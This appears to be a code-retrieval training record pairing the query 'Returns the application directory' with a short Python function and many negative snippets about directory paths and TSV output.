[ "0.7562754", "0.743017", "0.65671015", "0.65112525", "0.64657086", "0.64657086", "0.6451764", "0.64466846", "0.6254951", "0.6253342", "0.617585", "0.612374", "0.61043537", "0.60520536", "0.6024088", "0.6023335", "0.6000197", "0.59535676", "0.58751094", "0.58477306", "0.5843929", "0.58373475", "0.58362603", "0.5787403", "0.57794976", "0.57612395", "0.57568026", "0.5736809", "0.57268786", "0.5725884", "0.5718465", "0.5707559", "0.57068634", "0.57051593", "0.5701365", "0.5695726", "0.5692383", "0.5671681", "0.56697845", "0.5668952", "0.56333035", "0.56287324", "0.5622316", "0.55949354", "0.55928165", "0.5591611", "0.55842584", "0.5580846", "0.55775553", "0.55746657", "0.55710274", "0.55685514", "0.5568485", "0.5563695", "0.5558654", "0.5551221", "0.5549031", "0.5548754", "0.5541194", "0.5540035", "0.55400306", "0.55246824", "0.55188715", "0.5510329", "0.55068064", "0.5505558", "0.5502339", "0.5501603", "0.55009997", "0.5489955", "0.5486651", "0.5478949", "0.5477387", "0.5476911", "0.54641855", "0.54568875", "0.5454869", "0.5453928", "0.5453023", "0.54456866", "0.54424787", "0.54385954", "0.5437192", "0.54368", "0.54329026", "0.5427637", "0.5419708", "0.54187787", "0.5418108", "0.54150265", "0.5412744", "0.5411617", "0.54024976", "0.5402494", "0.54017276", "0.53987134", "0.53948605", "0.5394765", "0.5394127", "0.5392206", "0.53852654" ]
0.0
-1
Returns the application directory.
def get_appdir(): return APP_PATH
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def app_dir(self):\n return self._app_dir", "def appdata_dir(self) -> str:\n return os.path.join(self._project_dir, 'appdata')", "def thisdir():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n # Change this bit to match where you store your data files:\n return os.path.dirname(__file__)", "def this_folder():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n return os.path.dirname(__file__)", "def get_root_directory() -> str:\n return \"{}/../\".format(get_cur_directory(__file__))", "def root_dir():\r\n return Path(__file__).parent.parent", "def GetPackageDirectory():\n return os.path.dirname(__file__)", "def get_app_root():\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n return sys._MEIPASS\n except AttributeError:\n if 'pytest' in sys.modules:\n for arg in reversed(sys.argv):\n path = os.path.realpath(arg.split('::')[0])\n if os.path.exists(path):\n return path if os.path.isdir(path) else os.path.dirname(path)\n else:\n return os.path.dirname(os.path.realpath(sys.argv[0]))", "def config_directory(self):\n\n return self.get_raw(\"config_directory\")", "def _get_vispy_app_dir():\n # Define default user directory\n user_dir = os.path.expanduser('~')\n\n # Get system app data dir\n path = None\n if sys.platform.startswith('win'):\n path1, path2 = os.getenv('LOCALAPPDATA'), os.getenv('APPDATA')\n path = path1 or path2\n elif sys.platform.startswith('darwin'):\n path = os.path.join(user_dir, 'Library', 'Application Support')\n # On Linux and as fallback\n if not (path and os.path.isdir(path)):\n path = user_dir\n\n # Maybe we should store things local to the executable (in case of a\n # portable distro or a frozen application that wants to be portable)\n prefix = sys.prefix\n if getattr(sys, 'frozen', None): # See application_dir() function\n prefix = os.path.abspath(os.path.dirname(sys.path[0]))\n for reldir in ('settings', '../settings'):\n localpath = os.path.abspath(os.path.join(prefix, reldir))\n if os.path.isdir(localpath):\n try:\n open(os.path.join(localpath, 'test.write'), 'wb').close()\n os.remove(os.path.join(localpath, 'test.write'))\n except IOError:\n pass # We cannot write in this directory\n else:\n path = localpath\n break\n\n # Get path specific for this app\n appname = '.vispy' if path == user_dir else 'vispy'\n path = os.path.join(path, appname)\n return path", "def get_directory() -> str:\n return directory", "def root_dir():\n return dirname(dirname(__file__))", "def get_root_dir():\n return os.path.dirname(os.path.dirname(__file__))", "def AppPath(self):\n\t\treturn self.acad.Path", "def rootdir():\n return util.path(__file__).parent.parent.abspath()", "def path_to_program_dir(self):\n\tpath = sys.argv[0]\n\n\tif not os.path.isdir(path):\n\t path = os.path.dirname(path)\n\n\tif not path: return '.'\n\n\treturn path", "def get_current_directory():\n\treturn os.path.dirname(os.path.abspath(__file__))", "def acquire_package_directory():\n top_plugin_dir = os.path.realpath(os.path.join(os.getcwd(),\n os.path.dirname(__file__)))\n expected_package_dir = '/extras/MockApp'\n app_dir = top_plugin_dir + expected_package_dir\n return app_dir", "def root_dir():\n return os.path.dirname(os.path.realpath(__file__ + '/..'))", "def root_dir():\n return os.path.dirname(os.path.realpath(__file__ + '/..'))", "def get_config_dir() -> str:\n # Get the system app configuration standard location\n if 'APPDATA' in os.environ:\n return os.environ['APPDATA']\n elif 'XDG_CONFIG_HOME' in os.environ:\n return os.environ['XDG_CONFIG_HOME']\n else:\n return os.path.join(os.environ['HOME'], '.config')", "def directory_root():\n\timport os\n\treturn os.path.join(os.path.dirname(__file__), '../..')", "def dirname(self):\n module_system = str(self.conf.module.__name__).split(\".\")[-1]\n return root_path(module_system, self.conf.name)", "def program_dir():\n if (Win32() and (hasattr(sys, 'frozen') or imp.is_frozen('__main__'))):\n # running from exe generated by py2exe\n return os.path.dirname(sys.executable)\n else:\n return sys.path[0]\n # return os.path.dirname(os.path.abspath(sys.argv[0]))", "def configPath(self):\n return os.path.dirname(__file__)", "def app_package_path(self) -> str:\n return self._app_package_path", "def getPath(self):\n path = os.path.dirname(os.path.realpath(__file__)) #Finds the path of the application\n path =(os.path.dirname(os.path.realpath(__file__))+ '\\\\Enigma Settings') #Adds to the directory to create a folder\n \n return path #Returns the folders directory", "def app_config_home(self) -> str:\n if self.app_config_has(\"app_config_home_directory\"):\n return self.app_config()[\"app_config_home_directory\"]\n return os.path.join(os.path.expanduser(\"~\"), '.aiscalator')", "def get_main_dir():\n return os.path.dirname(os.getcwd())", "def config_dir(self) -> str:\n if not self._config_dir:\n self._config_dir = self._detect_config_dir()\n return self._config_dir", "def getRootPath()->str:\n if '--develop' in sys.argv:\n return eel._get_real_path('public') + '/'\n\n return eel._get_real_path('build') + '/'", "def appdata_dir():\r\n if platform.system() == \"Windows\":\r\n return os.path.join(os.environ[\"APPDATA\"], \"Electrum\")\r\n elif platform.system() == \"Linux\":\r\n return os.path.join(sys.prefix, \"share\", \"electrum\")\r\n elif (platform.system() == \"Darwin\" or\r\n platform.system() == \"DragonFly\" or\r\n\t platform.system() == \"NetBSD\"):\r\n return \"/Library/Application Support/Electrum\"\r\n else:\r\n raise Exception(\"Unknown system\")", "def root_dir():\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', \"..\")", "def get_installdir(self):\n import mewlo\n path = os.path.dirname(os.path.realpath(mewlo.__file__))\n return path", "def root_dir(self):\n path = self.config_path()\n if path:\n root_dir = os.path.dirname(path)\n if not root_dir.endswith(\"/\"):\n root_dir += \"/\"\n return root_dir\n return None", "def app_path(self, package):\n return self.adb.app_path(package)", "def getRootDirectory(self):\n if Globals.WORKFLOWS_BASEDIR[0] == '~':\n return os.path.expanduser(Globals.WORKFLOWS_BASEDIR)\n else:\n return os.path.join('', Globals.WORKFLOWS_BASEDIR)", "def get_workdir() -> str:\n Config.__get()\n assert Config.__config is not None\n return get_abspath(Config.__config.get('wsgi', 'workdir').strip())", "def get_working_dir(self):\n return self.role.directory", "def GetLauncherPath(self):\n return os.path.dirname(__file__)", "def GetLauncherPath(self):\n return os.path.dirname(__file__)", "def get_config_dir():\n return Path(environ.get(CONFIG_DIR_ENV_VAR, _default_dir))", "def get_base_dir(self):\n dir_of_this_file = os.path.dirname(os.path.abspath(__file__))\n return os.path.dirname(dir_of_this_file)", "def getSteamAppDir(appid: int) -> str:\n\tfor path in libraryFolders():\n\t\ttry:\n\t\t\tlogger.info(f'searching for {appid} in {path}..')\n\t\t\twith open(f'{path}appmanifest_{appid}.acf', 'r') as file:\n\t\t\t\t# found the app!\n\t\t\t\t# get the app's name\n\t\t\t\tinstDir = Property.parse( file, f'appmanifest_{appid}.acf' ).as_dict()[ 'appstate' ][ 'installdir' ]\n\t\t\t\tpath += f'common/{instDir}/'\n\t\t\t\tlogger.info(f'{appid} found! path: {path}')\n\t\t\t\treturn path\n\t\texcept FileNotFoundError:\n\t\t\t# if no, just continue\n\t\t\tcontinue\n\traise RuntimeError(f'No path found for app {appid}!')", "def get_package_dir():\n return Path(__file__).parent", "def configDir():\n return os.path.join(os.environ['HARNESSEDJOBSDIR'], 'config', getSiteName())", "def config_dir(self) -> Path:\n return self._config_dir", "def get_script_directory():\n return os.path.dirname(__file__)", "def home_directory(self):\n out = self._call(\"GETHOMEDIRECTORY\")\n return out.json()[\"Path\"]", "def service_directory(self) -> str:\n return pulumi.get(self, \"service_directory\")", "def getScriptDirectory():\n\n\treturn os.path.dirname(os.path.realpath(__file__))", "def find_project_dir():\r\n for path in sys.path:\r\n abs_path = os.path.join(os.path.abspath(path), \"app.yaml\")\r\n if os.path.exists(abs_path):\r\n return os.path.dirname(abs_path)\r\n\r\n raise RuntimeError(\"Unable to locate app.yaml on sys.path\")", "def confDir(self):\r\n return self._confDir", "def data_directory(self):\n\n return self.get_raw(\"data_directory\")", "def path(self):\n return os.path.join(self.config.get('path', os.getcwd()))", "def get_data_dir():\n return Path(current_app.config[\"USER_DIR\"]) / \"data\"", "def conf_dir(self):\r\n return self._conf_dir", "def _getCodeFolder(self):\n if getattr(sys, 'frozen', False):\n # we are running in a bundle (frozen)\n bundle_dir = sys._MEIPASS\n else:\n # we are running in a normal Python environment\n bundle_dir = os.path.dirname(os.path.abspath(__file__))\n return bundle_dir", "def get_app_config_dir(appname, *args):\n import ubelt as ub\n ub.schedule_deprecation(\n modname='ubelt', name='get_app_config_dir and ensure_app_config_dir', type='function',\n migration='use ubelt.Path.appdir(type=\"config\") instead',\n deprecate='1.2.0', error='2.0.0', remove='2.1.0')\n dpath = join(platform_config_dir(), appname, *args)\n return dpath", "def get_dir_path():\n return DIR_PATH", "def _get_recon_directory(self):\n\n return os.path.join(self._default_recon_dir_path, os.path.pardir, \"recon/\")", "def base_dir(self):\n return self.cm.get(YAML_CONFIG_WORKING_REPO)", "def get_path() -> str:\n return os.path.dirname(os.path.realpath(__file__))", "def localdir():\n root = __file__\n if os.path.islink(root):\n root = os.path.realpath(root)\n directory = os.path.dirname(os.path.abspath(root))\n return os.path.normpath(os.path.join(directory, \"../settings/\"))", "def get_working_dir():\n working_dir = os.path.dirname(os.path.abspath(__file__))\n return working_dir", "def path(self):\n path = os.path.join(self.base_dir, self.store().replace(' ', '_'), self.package_name())\n return os.path.abspath(path)", "def log_directory(self):\n\n return self.get_raw(\"log_directory\")", "def get_log_directory(self):\n\n return self.__config_parser__.get('SETTINGS', 'LOGFILE_DIRECTORY')", "def default_module_dir(self):\n return os.path.dirname(self._modules['default'].path)", "def get_directory(self):\n return self.directory", "def get_project_dir():\n\n return Path(settings.PROJECT_DIR)", "def app(self) -> str:\n return pulumi.get(self, \"app\")", "def get_project_dir():\n path = Path(__file__).parent.parent\n project_dir = path.parent\n return project_dir", "def directory(self) -> str:\n return self._values.get(\"directory\")", "def module_path(self):\n return self.config['cwd']", "def get_root_folder() -> Path:\n return Path(__file__).parent.parent", "def get_base_dir(self):\n return self._config_dict['output']['@baseDirectory']", "def app_name(self):\n module_filepath = inspect.getfile(type(self))\n parent_dir = os.path.dirname\n app_dirpath = parent_dir(parent_dir(parent_dir(module_filepath)))\n app_name = os.path.basename(app_dirpath)\n return app_name", "def GetPath(self):\n sdk_root = config.Paths().sdk_root\n if not sdk_root:\n raise NoSdkRootError()\n return os.path.join(sdk_root, self.name)", "def homeDirectory(self):\n\t\treturn self.__homeDirectory", "def dir(self) -> str:\n return f'{os.path.dirname(self.path)}/'.lstrip('/')", "def package_dir(self):\r\n return \".\"", "def get_project_root():\n return Path(__file__).parent.parent", "def get_dir(self):\n return self.dir", "def get_project_root():\n return str(Path(__file__).parent.parent)", "def get_project_root():\n return str(Path(__file__).parent.parent)", "def path(self):\n installed_packages_folder_path = site.getsitepackages()[0]\n return f'{installed_packages_folder_path}/{SITE_PACKAGES_FOLDER_NAME}'", "def _get_reporoot():\n from os import path\n import acorn\n medpath = path.abspath(acorn.__file__)\n return path.dirname(path.dirname(medpath))", "def location(self):\n\n p = os.path.abspath(__file__)\n pathSP = os.path.split(p)\n return pathSP", "def project_directory(self):\n\n # try to figure it out from the maps\n # search for Project path\n\n project_dir = None\n maps = self.comp_prefs['Paths'].get('Map', None)\n if maps:\n project_dir = maps.get('Project:', None)\n\n #if not project_dir:\n # # set the map for the project dir\n # if self.version:\n # project_dir = os.path.dirname(self.version.absolute_path)\n # self.project_directory = project_dir\n\n return project_dir", "def _get_project_dir(self):\n return os.path.expanduser(\n self.sqlfluff_config.get_section(\n (self.templater_selector, self.name, \"project_dir\")\n )\n or os.getcwd()\n )", "def get_working_directory():\n return os.getcwd()", "def python_dir(self):\n return self._python_dir", "def get_app_location(self, name: str) -> Path:\n location = self.config[\"apps\"].get(name)\n if location is None:\n _print_and_quit(f\"Unknown app '{name}'.\")\n return Path(location)", "def dir(self):\n return os.path.dirname(self.path)", "def get_working_dir(self):\r\n return self.process.get_working_dir()", "def findSettingsDirectory(appName=\"pyQode\"):\n home = os.path.expanduser(\"~\")\n if sys.platform == \"win32\":\n pth = os.path.join(home, appName)\n else:\n pth = os.path.join(home, \".%s\" % appName)\n if not os.path.exists(pth):\n os.mkdir(pth)\n return pth", "def getTemplateDir():\n return os.path.join(Configurations.getProjectRootDir(), TEMPLATE_DIR_NAME)", "def getParentDirectory():\n path = os.path.dirname(os.path.realpath(__file__))\n path = '/'.join( path.split('/')[:-1] )\n return path", "def getProjectRootDir():\n return ROOT_DIR" ]
[ "0.8366667", "0.7430168", "0.73666745", "0.7327246", "0.731593", "0.73079205", "0.7295801", "0.7282597", "0.7222026", "0.7218878", "0.72007245", "0.7196958", "0.71940666", "0.7193182", "0.71729344", "0.7168441", "0.7165291", "0.7127867", "0.70903516", "0.70903516", "0.708375", "0.7078099", "0.7051507", "0.7051216", "0.7017435", "0.7017429", "0.7015702", "0.6992589", "0.69919926", "0.6990434", "0.69808424", "0.6970868", "0.69568753", "0.6951718", "0.69347185", "0.69292074", "0.6920551", "0.69042134", "0.68786615", "0.68612844", "0.68612844", "0.6860265", "0.68600786", "0.68523574", "0.68496424", "0.6842661", "0.6841251", "0.68212795", "0.6781112", "0.67494637", "0.6731547", "0.6722558", "0.6720932", "0.67202854", "0.67042977", "0.6695731", "0.668822", "0.66733885", "0.66646963", "0.66566145", "0.6654507", "0.66539925", "0.66524273", "0.66520447", "0.6634699", "0.6625462", "0.662239", "0.6616391", "0.6614785", "0.660628", "0.66026753", "0.6596913", "0.6589512", "0.6583363", "0.6578113", "0.6575538", "0.6571483", "0.6570752", "0.6568595", "0.65591586", "0.6550087", "0.654546", "0.6544662", "0.653404", "0.6532385", "0.6532385", "0.6531273", "0.65243787", "0.6523377", "0.6517297", "0.6515852", "0.6510816", "0.64950424", "0.64836764", "0.647792", "0.64717335", "0.6457084", "0.6452234", "0.64507645", "0.64370465" ]
0.8947229
0
Return the TSV file corresponding to the current annotation level.
def tsv_name(): if PAR['level'] == 1: return 'col.tsv' else: return 'myc.tsv'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tsv_value(self):\n return self.tsv_file.getvalue()", "def export_tsv(self):\n outputfile = tkinter.filedialog.asksaveasfilename(\n defaultextension=\".tsv\",\n filetypes=((\"tab seperated values\", \"*.tsv\"),\n (\"All Files\", \"*.*\")))\n if outputfile:\n tabledata = self.tabs.window.aistracker.create_table_data()\n export.write_csv_file(tabledata, outputfile, dialect='excel-tab')\n else:\n raise ExportAborted('Export cancelled by user.')", "def get_ap_file(self):\n with open(self.trendfile, 'r') as readfile:\n data = json.load(readfile)\n return data['trendtable']", "def _current_vlog_fn(level):\n return getattr(vlog.Vlog, _LOG_MAPPING[level].__name__)", "def create_tsv(df, filename=None):\n table = df.to_string()\n lines = table.splitlines()\n index_name = lines.pop(1).strip()\n lines[0] = index_name + lines[0][len(index_name):]\n table = '\\n'.join(lines)\n if filename is not None:\n with open(filename, 'w') as f:\n f.write(table)\n else:\n return table", "def get_time_trace_file(root_dir, exp_name, plane_num):\n exp_dir = os.path.join(root_dir, exp_name)\n time_trace_dir = os.path.join(exp_dir, 'time_trace')\n plane_string = 'plane{0:02d}'.format(plane_num+1)\n plane_dir = os.path.join(time_trace_dir, plane_string)\n trace_file = os.path.join(plane_dir, 'timetrace_roi.mat')\n return trace_file", "def gencode_gtf(self):\n return op.join(self.root_dir, \"gencode.annotation.gtf\")", "def tsv_header(self):\n return self.tsv_lines[0]", "def _get_ann_file(self):\n prefix = 'instances' if 'test' not in self.image_set else 'image_info'\n return os.path.join(self.data_path, 'annotations',\n prefix + '_' + self.image_set + '.json')", "def write_files_tsv(md, import_path, target_path, import_type='flat'):\n\n target_path = pathlib.Path(target_path)\n import_path = pathlib.Path(import_path)\n\n if import_type == 'flat':\n md = md # If we implement other import types (e.g., plates), filter md\n else:\n raise ValueError('Currently only \\'flat\\' import types implemented')\n\n target_project = \"Project:name:\" + md.project.astype(str) + \"/\"\n target_dataset = \"Dataset:name:\" + md.dataset.astype(str)\n tsv_target = target_project + target_dataset\n filepath = str(target_path) + \"/\" + md.filename\n df = pd.DataFrame({\"target\": tsv_target, \"path\": filepath})\n files_tsv = df.to_csv(sep='\\t', header=False,\n index=False, quoting=csv.QUOTE_NONE)\n files_tsv_path = import_path / 'files.tsv'\n with open(files_tsv_path, 'w') as f:\n f.write(files_tsv)\n return files_tsv_path", "def _cmd_export_jtv(args):\n sample_ids = list(map(core.fbase, args.filenames))\n table = export.merge_samples(args.filenames)\n formatter = export.EXPORT_FORMATS[\"jtv\"]\n outheader, outrows = formatter(sample_ids, table)\n write_tsv(args.output, outrows, colnames=outheader)", "def outputLevelCsv(self):\n # extract level information from result info\n extract_level = []\n extract_level = [item for item in self._result_info if self._result_info[2][0:5]=='LEVEL']\n if extract_level == []:\n print('No Result of LEVEL')\n return None\n # copy need information\n for i, item in enumerate(extract_level):\n self._level_csv_list[i][0] = item[1]\n self._level_csv_list[i][1] = item[2].split('-')[1]\n self._level_csv_list[i][2] = item[2].split('-')[2]\n self._level_csv_list[i][3] = item[4]\n # set csv file name\n csv_file_name = self._filename.rsplit('.', 1)[1] + '.csv'\n # write csv\n with open(csv_file_name, 'w') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerows(self._level_csv_list)", "def write_tsv(self, filename):\n f = open(filename,'wb')\n wr = csv.writer(f,delimiter='\\t',quoting=csv.QUOTE_ALL)\n colrow = []\n for col in self.cols:\n colrow.append('<undefined>' if len(col) == 0 else unicode(iter(col).next()).encode('unicode-escape'))\n wr.writerow(colrow)\n for row in self.data:\n strrow = []\n for cell in row:\n strrow.append('' if cell is None else unicode(cell).encode('unicode-escape'))\n wr.writerow(strrow)\n f.close()", "def to_tsv(obj: ConfiguredBaseModel, file: str) -> str:\n\n # Extract headers and rows from object\n if isinstance(obj, Entity):\n headers = obj.dict().keys()\n rows = [list(obj.dict().values())]\n elif isinstance(obj, (AssociationCountList, HistoPheno, Results)):\n if not obj.items:\n headers = get_headers_from_obj(obj)\n rows = []\n else:\n headers = obj.items[0].dict().keys()\n rows = [list(item.dict().values()) for item in obj.items]\n else:\n raise TypeError(FMT_INPUT_ERROR_MSG)\n\n fh = open(file, \"w\") if file else sys.stdout\n writer = csv.writer(fh, delimiter=\"\\t\")\n writer.writerow(headers)\n for row in rows:\n writer.writerow(list(row))\n if file:\n fh.close()\n console.print(f\"\\nOutput written to {file}\\n\")\n\n return", "def annotate_tsv_freq(in_tsv_gz,annotation_tsv):\n sys.stderr.write(\"Reading TSV file ...\\n\")\n nicollo = pd.read_csv(BOLLI, sep=\"\\t\")\n nicollo = nicollo.iloc[:,[1,2,4,5,23]]\n nicollo_counts = nicollo.groupby(['CHR','START'])['MT'].count()\n nol_var = nicollo.drop(['WT','MT'], axis = 1) \n nol_var = nol_var.set_index(['CHR', 'START'])\n\n #nicollo_counts = nicollo.groupby([\"CHR\",\"START\",\"WT\",\"MT\"]).size().reset_index(name=\"count\")\n #nicollo_counts = nicollo_counts[[\"CHR\", \"START\",\"count\"]].set_index(['CHR','START'])\n\n mmrf = pd.read_csv('/ifs/res/leukgen/home/yellapav/MMRF/MMRF_CoMMpass_IA9_All_Canonical_Variants.txt', sep=\"\\t\")\n mmrf=mmrf.iloc[:,[0,1,2,4,5,19,23]]\n mmrf=mmrf.drop_duplicates()\n\n mmrfM=mmrf.groupby(['CHROM','POS'])['GEN[1].AR'].median()\n mmrfC=mmrf.groupby(['CHROM','POS'])['GEN[1].AR'].count()\n mmrfQ25=mmrf.groupby(['CHROM','POS'])['GEN[1].AR'].quantile(q=0.25)\n mmrfQ75=mmrf.groupby(['CHROM','POS'])['GEN[1].AR'].quantile(q=0.75)\n \n\n #anno_tsv = pd.read_csv(annotation_tsv, comment='#',sep=\"\\t\")\n anno_tsv = pd.read_csv(annotation_tsv, comment='#',sep=\"\\t\", low_memory=False)\n #anno_tsv[anno_tsv['FILTER'] == \"PASS\"]\n counts_tsv=anno_tsv.groupby([\"CHR\",\"START\",\"REF\",\"ALT\"]).size().reset_index(name=\"count\")\n counts_tsv=counts_tsv[[\"CHR\", \"START\",\"count\"]].set_index(['CHR','START'])\n counts_median=anno_tsv.groupby(['CHR','START'])['TARGET_VAF'].median()\n\n\n\n inFile = gzip.open(in_tsv_gz,'r')\n \n sys.stderr.write(\"Annotating ...\\n\")\n for record in inFile:\n record=record.decode(\"utf-8\")\n record=record.rstrip()\n recArr=record.split(\"\\t\")\n \n cl = [] \n freq = [] \n medVAF = [] \n Q25 = [] \n Q75 = [] \n positions = [] \n normal = \"0\" \n normalVAF = \"0\" \n bolli_cl = [] \n bolli_freq = [] \n bolli_positions = [] \n bolli_anno = [] \n flag = 0\n bolli_flag = 0\n if record.startswith(\"#\"):\n continue\n\n if recArr[0] == \"ID_VARIANT\":\n cl = \"MMRF_Class\"\n freq = \"MMRF_Frequency\"\n medVAF = \"MMRF_VAF\"\n Q25 = \"MMRF_Q25\"\n Q75 = \"MMRF_Q75\"\n positions = \"MMRF_Positions\"\n normal = \"Normals_Frequency\"\n normalVAF = \"Normals_median_VAF\"\n bolli_cl = \"Bolli_Class\"\n bolli_freq = \"Bolli_Frequency\"\n bolli_positions = \"Bolli_Positions\"\n bolli_anno = \"Bolli_Annotation\"\n record = [ record, cl, freq, medVAF, Q25, Q75, positions, bolli_cl, bolli_freq, bolli_anno, bolli_positions, normal, normalVAF ]\n record = (\"\\t\".join(record))\n print(record)\n continue\n\n try:\n chrom = str(recArr[3])\n pos = int(recArr[4])\n start = int(recArr[4]) - 9\n end = int(recArr[4]) + 9\n if (chrom, pos) in mmrfC.index:\n cl = \"genomic_exact\"\n freq = str(mmrfC.loc[(chrom,pos)])\n medVAF = str(mmrfM.loc[(chrom,pos)])\n Q25 = str(mmrfQ25.loc[(chrom,pos)])\n Q75 = str(mmrfQ75.loc[(chrom,pos)])\n positions = str(pos)\n record = [ record, cl, freq, medVAF, Q25, Q75, positions ]\n record = (\"\\t\".join(record))\n flag = 1\n if flag == 0:\n mmrfCsub=mmrfC.loc[chrom]\n if not mmrfCsub[(mmrfCsub.index >= start) & (mmrfCsub.index <= end)].empty:\n for i in mmrfCsub[(mmrfCsub.index >= start) & (mmrfCsub.index <= end)].index.values:\n cl = \"genomic_close\"\n freq.append(str(mmrfC.loc[(chrom,i)]))\n medVAF.append(str(mmrfM.loc[(chrom,i)]))\n Q25.append(str(mmrfQ25.loc[(chrom,i)]))\n Q75.append(str(mmrfQ75.loc[(chrom,i)]))\n positions.append(str(i))\n freq = (\":\".join(freq))\n medVAF = (\":\".join(medVAF))\n Q25 = (\":\".join(Q25))\n Q75 = (\":\".join(Q75))\n positions = (\":\".join(positions))\n record = [ record, cl, freq, medVAF, Q25, Q75, positions ]\n record = (\"\\t\".join(record))\n else:\n cl = \"NA\"\n freq = \"NA\"\n medVAF = \"NA\"\n Q25 = \"NA\"\n Q75 = \"NA\"\n positions = \"NA\"\n record = [ record, cl, freq, medVAF, Q25, Q75, positions ]\n record = (\"\\t\".join(record))\n\n\n except:\n cl = \"NA\"\n freq = \"NA\"\n medVAF = \"NA\"\n Q25 = \"NA\"\n Q75 = \"NA\"\n positions = \"NA\"\n record = [ record, cl, freq, medVAF, Q25, Q75, positions ]\n record = (\"\\t\".join(record))\n\n\n\n try:\n chrom = str(recArr[3])\n pos = int(recArr[4])\n start = int(recArr[4]) - 9\n end = int(recArr[4]) + 9\n if (chrom, pos) in nicollo_counts.index:\n bolli_cl = \"genomic_exact\"\n bolli_freq = str(nicollo_counts.loc[(chrom,pos)]) \n bolli_positions = str(pos)\n bolli_anno = str(nol_var.loc[chrom, pos]['Variant_class'].values[0])\n record = [ record, bolli_cl, bolli_freq, bolli_anno, bolli_positions ]\n record = (\"\\t\".join(record))\n bolli_flag = 1\n\n\n if bolli_flag == 0: \n nicollo_counts_sub=nicollo_counts.loc[chrom]\n if not nicollo_counts_sub[(nicollo_counts_sub.index >= start) & (nicollo_counts_sub.index <= end)].empty:\n for i in nicollo_counts_sub[(nicollo_counts_sub.index >= start) & (nicollo_counts_sub.index <= end)].index.values:\n #if not nicollo_counts_sub.ix[start:end].empty:\n # for i in nicollo_counts_sub.ix[start:end].index.values:\n #print(\"XXXXXXX\",i, nicollo_counts_sub.loc[(chrom,i)], start, end)\n bolli_cl = \"genomic_close\"\n bolli_freq.append(str(nicollo_counts.loc[(chrom,i)]))\n bolli_anno.append(str(nol_var.loc[(chrom,i)]['Variant_class'].values[0]))\n bolli_positions.append(str(i))\n bolli_freq = (\":\".join(bolli_freq))\n bolli_positions = (\":\".join(bolli_positions))\n bolli_anno = (\":\".join(bolli_anno))\n record = [ record, bolli_cl, bolli_freq, bolli_anno, bolli_positions ]\n record = (\"\\t\".join(record))\n else:\n bolli_cl = \"NA\"\n bolli_freq = \"NA\"\n bolli_positions = \"NA\"\n bolli_anno = \"NA\"\n record = [ record, bolli_cl, bolli_freq, bolli_anno, bolli_positions ]\n record = (\"\\t\".join(record))\n\n\n except:\n bolli_cl = \"NA\"\n bolli_freq = \"NA\"\n bolli_anno = \"NA\"\n bolli_positions = \"NA\"\n record = [ record, bolli_cl, bolli_freq, bolli_anno, bolli_positions ]\n record = (\"\\t\".join(record))\n\n\n normal = \"0\"\n normalVAF = \"0\"\n try:\n chrom=str(recArr[3])\n pos=int(recArr[4])\n normal = counts_tsv.loc[(chrom,pos),\"count\"]\n normal = normal.ix[0]\n normal = str(normal)\n\n normalVAF = str(counts_median.loc[(chrom,pos)])\n\n record = [ record, normal, normalVAF ]\n record = (\"\\t\".join(record))\n print(record)\n\n except:\n normal = \"0\"\n normalVAF = \"0\"\n record = [ record, str(normal), str(normalVAF) ]\n record = (\"\\t\".join(record))\n print(record)", "def get_filepath(self, **kwargs) -> str:\n return f'dag_{self.dag_id}.py'", "def exportVTK(self, fname):\r\n filename, ext = os.path.splitext(fname)\r\n if self.GridType == \"vtkStructuredGrid\":\r\n sWrite = vtk.vtkXMLStructuredGridWriter()\r\n sWrite.SetInputData(self.Grid)\r\n sWrite.SetFileName(filename + \".vts\")\r\n sWrite.Write()\r\n elif self.GridType == \"vtkUnstructuredGrid\":\r\n sWrite = vtk.vtkXMLUnstructuredGridWriter()\r\n sWrite.SetInputData(self.Grid)\r\n sWrite.SetFileName(filename + \".vtu\")\r\n sWrite.Write()\r\n else:\r\n print(\"Grid type is not recognized\")", "def collapsed_to_sirv_abundance(self):\n return op.join(self.collapse_to_sirv_dir, \"touse.abundance.txt\")", "def _original_vlog_fn(level):\n return _LOG_MAPPING[level]", "def read_tsv(path):\n return pd.read_csv(path, sep=\"\\t\", index_col=0)", "def write_tsv(df, path):\n df.to_csv(path, sep=\"\\t\", compression=\"gzip\")", "def get_level(self, level):\n return", "def get_tag(level: int) -> str:\n return LEVEL_TAGS[level]", "def to_tsv(self, out_dir, sep=\"\\t\", prefix=None, **kwargs):\n os.makedirs(out_dir, exist_ok=True) # create dirs if non-existent\n prefix = f\"{prefix}_\" if prefix else \"\"\n fpaths = [\n os.path.join(out_dir, f\"{prefix}{suf}.tsv\")\n for suf in [\"data\", \"sample_meta\"]\n ]\n self.data.to_csv(fpaths[0], sep=\"\\t\", **kwargs)\n self.sample_meta.to_csv(fpaths[1], sep=\"\\t\", **kwargs)", "def print_tsv(data, filename):\n with open(filename, 'wt') as fout:\n writefile = partial(print, sep='\\t', file=fout)\n writefile('Sample', *expected_header)\n for sample in data:\n for entry in data[sample]:\n writefile(sample, *(entry[field] for field in expected_header))", "def convert_tracefilename(self, filepath):\n filename, extension = os.path.splitext(os.path.basename(filepath))\n return filename + '.csv'", "def kmer_vector2tsv_file(filename, kmer_vector, min_length, max_length,\n enable_gzip=False):\n try:\n fh = gzip.open if enable_gzip else open\n with fh(filename, 'wt') as out:\n for index, count in enumerate(kmer_vector):\n seq = number2multisize_patten(index, min_length, max_length)\n out.write('{seq}\\t{count}\\n'.format(seq=seq,\n count=count))\n return filename\n except Exception:\n print('Not able to create [%s]\\n' % filename)\n raise", "def _tf(file_path):\n return os.path.join(test_pipeline_dir, file_path)", "def save_tsv_file(parsed_data):\n result_file.write('\\t'.join(parsed_data) + '\\n')", "def getSceneFile(self):\n logger.debug(\"Func: getSceneFile\")\n return -1", "def write_tsv_fast(self, filename):\n # TODO (without quotation marks)\n with open(filename, 'wb') as f:\n colnames = ['<undefined>' if len(col) == 0 else unicode(iter(col).next()).encode('unicode-escape') for col in self.cols]\n f.write('\\t'.join(colnames)+'\\n')\n for row in self.data:\n f.write('\\t'.join(['' if cell is None else 